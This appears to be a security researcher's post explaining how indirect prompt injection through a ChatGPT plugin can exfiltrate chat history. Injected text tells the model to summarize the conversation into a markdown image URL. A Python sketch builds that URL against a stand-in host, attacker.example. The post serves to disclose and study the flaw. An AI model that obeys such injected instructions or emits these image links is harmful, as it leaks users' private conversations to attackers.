This post shows how a malicious website can take control of a ChatGPT chat session and exfiltrate the history of the conversation. With plugins, data exfiltration can already happen by sending too much data into the plugin in the first place; more security controls and more visibility into what is being sent to a plugin are needed to empower users. However, this post is not about sending too much data to a plugin, but about a malicious actor who controls the data a plugin retrieves. Whoever controls the data a plugin retrieves can exfiltrate chat history because of how ChatGPT renders markdown images: when the model emits a markdown image, ChatGPT renders it automatically and the client fetches the image URL. During an Indirect Prompt Injection the adversary controls what the LLM is doing (I call it AI Injection for a reason), and the injected instructions can tell the model to summarize the past chat history and append that summary to the image URL, exfiltrating the data to the attacker's server.
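To make the mechanics concrete, here is a minimal sketch of the markdown image an injected prompt would instruct the model to emit. The endpoint `attacker.example`, the query parameter `q`, and the helper function are hypothetical, chosen only for illustration; any attacker-controlled URL works the same way.

```python
from urllib.parse import quote

# Hypothetical attacker-controlled endpoint that logs incoming requests.
ATTACKER_URL = "https://attacker.example/log"

def build_exfil_markdown(chat_summary: str) -> str:
    """Build the markdown image an injected prompt would ask the LLM to emit.

    When ChatGPT renders this markdown, the client fetches the image URL,
    delivering the URL-encoded chat summary to the attacker's server.
    """
    return f"![a]({ATTACKER_URL}?q={quote(chat_summary)})"

print(build_exfil_markdown("user asked about travel plans to Paris"))
# -> ![a](https://attacker.example/log?q=user%20asked%20about%20travel%20plans%20to%20Paris)
```

The image itself can be a 1x1 transparent pixel, so the user sees nothing unusual in the rendered response while the query string carries the data.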